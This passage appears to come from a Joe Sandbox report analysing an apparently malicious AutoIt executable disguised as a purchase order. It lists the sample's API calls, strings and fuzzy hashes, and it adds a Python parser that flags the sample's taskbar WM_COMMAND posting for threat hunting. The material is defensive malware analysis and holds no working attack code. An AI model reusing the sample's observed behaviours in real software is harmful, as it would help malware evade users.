                                                            • Instruction ID: 1e149f93898fe9afff494952afced4f728167d7c2cca3c00b97e401526751dc1
                                                            • Opcode Fuzzy Hash: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                                                            • Instruction Fuzzy Hash: 4FF04C722007045AE3149E6ADC41FD7B7ECDBD8714F50442EF74997241E1B8A9858764
                                                            APIs
                                                            • SendMessageW.USER32(?,00001001,00000000,?), ref: 004560FE
                                                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                            • wsprintfW.USER32 ref: 0045612A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: MessageSend_mallocwsprintf
                                                            • String ID: %d/%02d/%02d
                                                            • API String ID: 1262938277-328681919
                                                            • Opcode ID: 0791508f4d5d4d8a4d88f52051df625728301e413c657ab928a68c4181838543
                                                            • Instruction ID: 953f6dd97ce98099cbba652085d0304866be84a46252058ffc4865c1a62d2123
                                                            • Opcode Fuzzy Hash: 0791508f4d5d4d8a4d88f52051df625728301e413c657ab928a68c4181838543
                                                            • Instruction Fuzzy Hash: 9DF0823274022866D7109BD9AD42FBEB3A8DB49762F00416BFE08E9180E6694854C3B9
                                                            APIs
                                                            • InternetCloseHandle.WININET(?), ref: 00442663
                                                            • InternetCloseHandle.WININET ref: 00442668
                                                              • Part of subcall function 004319AC: WaitForSingleObject.KERNEL32(aeB,?,?,00442688,aeB,00002710,?,?,00426561,?,?,0040F19D), ref: 004319BD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: CloseHandleInternet$ObjectSingleWait
                                                            • String ID: aeB
                                                            • API String ID: 857135153-906807131
                                                            • Opcode ID: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                                            • Instruction ID: 0fa74210230a71b56b5a48e3a0e63043fcf8dca502afcbd281d0c2380f7acdeb
                                                            • Opcode Fuzzy Hash: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                                            • Instruction Fuzzy Hash: 46E0E67650071467D310AF9ADC00B4BF7DC9F95724F11482FEA4497650C6B5B4408BA4
                                                            APIs
                                                            Strings
                                                            • C:\Users\user\Desktop\Purchase order MIPO2425110032.exe, xrefs: 0043324B
                                                            • ^B, xrefs: 00433248
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: _wcsncpy
                                                            • String ID: ^B$C:\Users\user\Desktop\Purchase order MIPO2425110032.exe
                                                            • API String ID: 1735881322-1603518458
                                                            • Opcode ID: f7c3fd886c497ae33bdd3057849675e3afdb83c7c480df0bc310b3c11edf5eb4
                                                            • Instruction ID: 95fca152a805ab331260cabc3645652019b64b11bc5d0d7a1f408bc65d2df1f2
                                                            • Opcode Fuzzy Hash: f7c3fd886c497ae33bdd3057849675e3afdb83c7c480df0bc310b3c11edf5eb4
                                                            • Instruction Fuzzy Hash: ADE0C23360051A7B9710DE4AD841DBBF37DEEC4A20B08802AF90883200E2B1BD1A43E4
                                                            APIs
                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441BFE
                                                            • PostMessageW.USER32(00000000), ref: 00441C05
                                                              • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: FindMessagePostSleepWindow
                                                            • String ID: Shell_TrayWnd
                                                            • API String ID: 529655941-2988720461
                                                            • Opcode ID: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                                                            • Instruction ID: aba4e04af0122a293c2d26b46e7c49f9db856b5fc79b6d6ac13cebee95b63d36
                                                            • Opcode Fuzzy Hash: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                                                            • Instruction Fuzzy Hash: EFD0A772BC13013BFA6077745D0FF8B66145B14711F000C3A7B42E61C1D4F8E4018758
                                                            APIs
                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441C2A
                                                            • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00441C3D
                                                              • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: FindMessagePostSleepWindow
                                                            • String ID: Shell_TrayWnd
                                                            • API String ID: 529655941-2988720461
                                                            • Opcode ID: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                                                            • Instruction ID: e91d5bd0f3095d95abf168919443ed1e5ef8457e9bc9ee6dadeb2d3358a759b2
                                                            • Opcode Fuzzy Hash: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                                                            • Instruction Fuzzy Hash: 61D0A772B843017BFA6077745D0FF8B66145B14711F000C3A7B46A61C1D4F8D4018758
                                                            APIs
                                                            • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 004370D1
                                                              • Part of subcall function 004118DA: _doexit.LIBCMT ref: 004118E6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Message_doexit
                                                            • String ID: AutoIt$Error allocating memory.
                                                            • API String ID: 1993061046-4017498283
                                                            • Opcode ID: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                                                            • Instruction ID: aa36ec6b1cc278624b5c670a1a0522bf80bf1016c56dd6686bcadf549e8ac499
                                                            • Opcode Fuzzy Hash: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                                                            • Instruction Fuzzy Hash: F1B092323C030627E50437910D0BF9D26003B64F02F220C067324280D204C90090131D
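The function entries above all follow one shape: an APIs list of direct calls with their argument values and code references, optional "Part of subcall function" lines, and a Similarity block of IDs and fuzzy hashes. The following Python is an added example, not Joe Sandbox code and not code from the sample, that parses entries in that listing format into records, decodes the PostMessageW arguments (0x111 is WM_COMMAND per winuser.h; 0x197 = 407 is the command ID carried in wParam; what that ID does on the taskbar is not stated in the report and is not asserted here), and flags the FindWindowW(Shell_TrayWnd) + PostMessageW(WM_COMMAND) pairing seen twice on this page. The sample text inside the block is constructed from the entries shown above; note that the first entry records only the hwnd argument for PostMessageW, so the decoder reports no message name for it and it is not flagged.

```python
"""Parse Joe Sandbox function-entry listings and flag the Shell_TrayWnd/WM_COMMAND pair.
Added example: not Joe Sandbox's code and not code from the analysed sample."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Window message values from winuser.h (only the ones this decoder names).
WINDOW_MESSAGES = {0x0002: "WM_DESTROY", 0x0010: "WM_CLOSE", 0x0012: "WM_QUIT",
                   0x0100: "WM_KEYDOWN", 0x0111: "WM_COMMAND", 0x0112: "WM_SYSCOMMAND"}

# Constructed sample in the report's own format, built from the entries on this page.
SAMPLE = """\
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441BFE
• PostMessageW.USER32(00000000), ref: 00441C05
  • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000), ref: 004331B9
Strings
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• Instruction Fuzzy Hash: EFD0A772BC13013BFA6077745D0FF8B66145B14711F000C3A7B42E61C1D4F8E4018758
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441C2A
• PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00441C3D
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
APIs
• MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 004370D1
  • Part of subcall function 004118DA: _doexit.LIBCMT ref: 004118E6
Similarity
• API ID: Message_doexit
• String ID: AutoIt$Error allocating memory.
"""

_CALL_RE = re.compile(r"^•\s+(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")
_SUBCALL_RE = re.compile(r"Part of subcall function (?P<fn>[0-9A-Fa-f]+):\s*(?P<api>\w+)\.(?P<mod>\w+)")
_KV_RE = re.compile(r"^•\s+(?P<key>[^:]+):\s*(?P<val>.*)$")


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: str


@dataclass
class FunctionEntry:
    calls: List[ApiCall] = field(default_factory=list)
    subcalls: List[str] = field(default_factory=list)  # "api.module@caller"
    meta: Dict[str, str] = field(default_factory=dict)  # Similarity / dump metadata


def parse_entries(text: str) -> List[FunctionEntry]:
    """Split the listing on 'APIs' headers; bullet lines are calls or key/value metadata."""
    entries: List[FunctionEntry] = []
    cur: Optional[FunctionEntry] = None
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if not line.startswith("•"):  # bare section header
            section = line
            if line == "APIs":
                cur = FunctionEntry()
                entries.append(cur)
            continue
        if cur is None:
            continue
        if section == "APIs":
            m = _SUBCALL_RE.search(line)
            if m:
                cur.subcalls.append(f"{m['api']}.{m['mod']}@{m['fn']}")
                continue
            m = _CALL_RE.match(line)
            if m:
                args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
                cur.calls.append(ApiCall(m["api"], m["mod"], args, m["ref"].upper()))
        else:
            m = _KV_RE.match(line)
            if m:
                cur.meta[m["key"].strip()] = m["val"].strip()
    return entries


def parse_hex(tok: str) -> Optional[int]:
    """Report arguments are zero-padded hex; '?' or string literals are not numbers."""
    try:
        return int(tok, 16)
    except ValueError:
        return None


def decode_post_message(call: ApiCall) -> Dict[str, object]:
    """Name the message in a PostMessageW/SendMessageW call (hwnd, msg, wParam, lParam)."""
    vals = [parse_hex(a) for a in call.args[:4]]
    msg = vals[1] if len(vals) > 1 else None
    return {"hwnd": vals[0] if vals else None,
            "msg": WINDOW_MESSAGES.get(msg, f"0x{msg:04X}") if msg is not None else None,
            "wparam": vals[2] if len(vals) > 2 else None,
            "lparam": vals[3] if len(vals) > 3 else None}


def flag_shell_tray_command(entry: FunctionEntry) -> Optional[Dict[str, object]]:
    """FindWindowW('Shell_TrayWnd') plus a WM_COMMAND post in the same function."""
    if not any(c.api == "FindWindowW" and c.args and c.args[0] == "Shell_TrayWnd" for c in entry.calls):
        return None
    for c in entry.calls:
        if c.api in ("PostMessageW", "SendMessageW"):
            d = decode_post_message(c)
            if d["msg"] == "WM_COMMAND":
                return d
    return None


def summarize(text: str) -> List[Dict[str, object]]:
    """One row per function entry: IDs, call sequence, fuzzy hash and the tray-command flag."""
    return [{"api_id": e.meta.get("API ID"), "string_id": e.meta.get("String ID"),
             "sequence": [f"{c.api}.{c.module}" for c in e.calls],
             "instruction_fuzzy_hash": e.meta.get("Instruction Fuzzy Hash"),
             "shell_tray_command": flag_shell_tray_command(e)}
            for e in parse_entries(text)]


if __name__ == "__main__":
    for row in summarize(SAMPLE):
        print(row)
```

The Instruction Fuzzy Hash values are what you would carry into a similarity search across other reports; the decoded WM_COMMAND row is the one worth a hunting query, since a legitimate program rarely needs to locate the taskbar window and post it command IDs.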